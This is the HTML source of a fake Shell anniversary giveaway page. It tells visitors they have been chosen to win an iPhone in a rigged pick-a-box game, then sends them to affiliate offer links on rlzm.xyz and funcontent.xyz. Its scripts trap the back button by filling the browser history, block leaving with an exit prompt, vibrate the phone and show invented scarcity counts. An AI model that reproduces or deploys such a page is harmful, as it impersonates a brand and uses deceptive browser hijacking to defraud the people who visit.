<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
  <meta charset="utf-8">
 <!-- <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
            } else {
                window.location.href = "http://www.goern.com";
            }
  </script>
  -->
  <script type="text/javascript">

        if(navigator.browserLanguage) {  
      var language = navigator.browserLanguage;    
   }
   else if(navigator.language) {
      var language = navigator.language;
   }
   
   switch (language.substring(0,2))  {
      
      case "" : location.href="";
         break;
  }

  </script>
  <title>Shl 1 2025</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content=
  "width=device-width, initial-scale=1">
  <meta name="lander" content="survey-pick-a-box">
  <meta name="description" content="survey-pick-a-box">
  <link rel="shortcut icon" href="data:image/x-icon" type=
  "image/x-icon">
  <link href="css/app1.css?id=2fbe2d9a9a40ca9b2489" type="text/css"
  rel="stylesheet">
  <meta name="robots" content="noindex,nofollow">
  <style>

  .app{align-items:center;box-sizing:border-box;display:flex;justify-content:center;padding:20px}.left,.right{align-self:start;margin:0 20px;max-width:400px;width:100%}.product-preview__title{font-family:Pacifico,sans-serif;font-size:36px}.product-preview__image{max-width:340px;width:100%}.survey{background:#eaeaea;font-size:18px;font-weight:700;max-width:none;padding:40px;position:relative;text-align:center}.survey__question{color:#000}.survey__answer{background:#dd1d21;border:8px solid #dd1d21;border-radius:14px;box-shadow:none;color:#fff;cursor:pointer;display:block;font-size:30px;font-weight:700;line-height:28px;margin-top:15px;padding:19px 20px;text-decoration:none;width:100%}.survey__steps{margin-top:20px}.survey__step{background:#dd1d21;border-radius:50%;display:inline-block;font-size:0;height:30px;margin:0 5px;width:30px}.survey__step--active{background:#fdc700}.modal{color:#000;z-index:6}.modal__content{background-color:#f7f3ed;padding:20px}.opening-modal__image{max-width:200px;width:100%}.button{background-color:#dd1d21;border:none;border-radius:.25rem;color:#fff;display:inline-block;font-size:1.6rem;font-weight:400;line-height:1.5;padding:.25rem 3.80rem;text-decoration:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;vertical-align:middle}.button,.verify{text-align:center}.verify{background:#eaeaea;color:#000;padding:40px}.verify__text{padding:2px 0}.verify__icon{max-width:13px}.verify__icon--spinner{opacity:0}.verify__icon--visible{opacity:1}.text-rotator{font-size:21px;margin-bottom:10px}@media(max-width:640px){.app{flex-direction:column}.left,.right{margin:0;max-width:none;width:100%}.survey{padding:20px}.survey__answer{font-size:20px;line-height:18px;padding:10px}}
  </style>
  <style>
    
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");

  * {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: 14px;
    box-sizing: border-box;
  text-align:center;


  }
   html,
            body {
                font-size: 16px;
                width: 100%;
                height: 100%;
                padding: 0;
                margin: 0;
                
                -webkit-text-size-adjust: 100%;
                -webkit-tap-highlight-color: transparent;
            }

  </style>
</head>
<body>
  <img src='https://i.imgur.com/1ZYq3at.png' width='100%'>
  <img src='https://i.imgur.com/XXhyIAk.jpeg' width='100%'>
  <div class="app" id="app" v-cloak="">
    <img class="opening-modal__image" src=
    "https://i.imgur.com/bTckbay.png" alt=
    "Apple iPhone 13 Pro Max">
    <h1 class="heading heading--h1">Congratulations!</h1>
    <p class="paragraph">On the occasion of the 117th Anniversary,
    you have been chosen among the few to receive a free SHELL
    Gifts.</p>
    <p class="paragraph"></p><br>
    <button class="button" v-on:click=
    "showOpeningModal = false; $confetti.stop()">CONTINUE</button>
    <img src="https://i.imgur.com/awy8GvJ.png" style=
    "width: 100px;">
    <h2 class="heading heading--h1">Congratulation !</h2>
    <h4 class="heading heading--h1">Your answers have been
    saved</h4>
    <p class="paragraph">This is your chance!<br>
    <br>
    You must select the box with the gift inside it.<br>
    <br>
    you have got 3 attempts, Good luck!</p><br>
    <button class="button" v-on:click=
    "showInstructionsModal = false">Start now</button> <img src=
    "https://i.imgur.com/awy8GvJ.png" style="width: 100px;">
    <h1 class="heading heading--h1">Better luck next time</h1>
    <p class="paragraph">You have (2) extra chances.</p><br>
    <button class="button" v-on:click=
    "showFailModal = false">OK</button> <img src=
    "https://i.imgur.com/kJr45kK.png" style="width: 185px;">
    <h1 class="heading heading--h1">Congratulations!</h1>
    <h3 class="heading heading--h1">You did it! you won :</h3>
    <p class="paragraph">(Apple iPhone 16 Pro Max - 256GB)<br>
    <br>
    Follow the instructions on the next page to claim your prize
    !</p><br>
    <button class="button" onclick="go();">NEXT</button>
    <div class="left">
      <div class="product-preview">
        <div class="product-preview__title"></div>
      </div>
    </div>
    <div class="right">
      <div class="verify" v-if="showRotator">
        <div class="verify__text" v-if="rotateIndex &gt; 1">
        <strong>You have answered all of the questions.</strong>
        <img class="verify__icon verify__icon--checked" src=
        "https://i.imgur.com/h2TlPRH.png" alt=""></div>
        <div class="verify__text" v-else="">Your answers are being
        processed <img class="verify__icon verify__icon--spinner"
        src="https://i.imgur.com/k9kyJTQ.gif" alt=""></div>
        <div class="verify__text" v-if="rotateIndex &gt; 2">
        <strong>There are still prizes available!</strong>
        <img class="verify__icon verify__icon--checked" src=
        "https://i.imgur.com/h2TlPRH.png" alt=""></div>
        <div class="verify__text" v-else="">Looking for gifts..
        <img class="verify__icon verify__icon--spinner" src=
        "https://i.imgur.com/k9kyJTQ.gif" alt=""></div>
        <div class="verify__text" v-if="rotateIndex &gt; 3">
        <strong>Only (344) gifts remain!</strong> <img class=
        "verify__icon verify__icon--checked" src=
        "https://i.imgur.com/h2TlPRH.png" alt=""></div>
        <div class="verify__text" v-else="">Stock is being checked
        <img class="verify__icon verify__icon--spinner" src=
        "https://i.imgur.com/k9kyJTQ.gif" alt=""></div>
      </div>
    </div>
  </div>
  <script>
  window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;
  </script> 
  <script src="css/app1.js?id=d41d8cd98f00b204e980" type=
  "application/javascript"></script> 
  <script src="css/app.js?id=17138759790b445ece6b" type=
  "application/javascript"></script> 
  <script>

  function go() {
    window.onbeforeunload = null;
        window.open('engshare');
    window.location = 'https://rlzm.xyz/temuanosenmo/';
  }
  </script> 
  <script>

  var PreventExitPop = true;

  function ExitPop() {
    if (PreventExitPop != false) {
        return "Don't miss out!";
    }
  }
  window.onbeforeunload = ExitPop;
  </script> 
  <script>

    ! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#')
        onpopstate = function(event) {
            event.state && location.replace('#');
        }
    } catch (o) {
        console.log(o);
    }
  }();
  </script> 
  <script>

        navigator.vibrate([1000, 300, 1000, 300,1000]);
  </script> <img src='https://i.imgur.com/CZH7fgA.jpeg' width=
  '100%'> 
  <script src=
  "/p.js?f=sync&amp;lr=1&amp;partner=6ead5f0c5ddb6c1d33a3179db69d52f2ab5ba8ceb41f0306c27032933ca3b3f3"
  defer></script>
  <script>
  'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl509564'},{'dcenter':'p3'},{'cp_id':'10405938'},{'cp_cl':'8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.
  </script>
  <script src=
  'https://img1.wsimg.com/traffic-assets/js/tccl.min.js'></script> 
  <!-- Histats.com  START  (aync)-->
  <script type="text/javascript">
  var _Hasync= _Hasync|| [];
  _Hasync.push(['Histats.start', '1,4916597,4,0,0,0,00010000']);
  _Hasync.push(['Histats.fasi', '1']);
  _Hasync.push(['Histats.track_hits', '']);
  (function() {
  var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
  hs.src = ('//s10.histats.com/js15_as.js');
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
  })();
  </script> <noscript><a href="/" target="_blank"><img src=
  "//sstatic1.histats.com/0.gif?4916597&amp;101" alt=
  "free hit counter script" border="0"></a></noscript> 
  <!-- Histats.com  END  -->
</body>
</html>
